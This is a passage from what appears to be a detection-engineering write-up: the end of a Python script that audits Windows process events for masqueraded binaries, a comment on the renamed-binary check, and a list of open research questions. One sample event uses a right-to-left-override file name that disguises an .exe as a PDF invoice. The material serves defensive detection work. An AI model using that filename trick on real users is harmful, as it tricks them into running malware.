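    {"Image": "C:\\Users\\bob\\Downloads\\invoice" + RTLO + "fdp.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": ""},
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "OriginalFileName": "EXPLORER.EXE"},                                             # genuine
]

if __name__ == "__main__":
    for ev, findings in zip(SAMPLE_EVENTS, audit(SAMPLE_EVENTS)):
        print(ev["Image"], findings or "ok")
```

The renamed-binary check is the one worth keeping even where the others are noisy: an attacker can choose any file name, but changing OriginalFileName means rebuilding the version resource, which most operators never bother to do.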

GPU MEMORY?
BROWSER SANDBOXES? (SEE MAGECART-LIKE ATTACKS)
WEBASSEMBLY?
RUST AND OTHER LANGUAGES COMPILED ON THE FLY?
MOBILE PLATFORM?
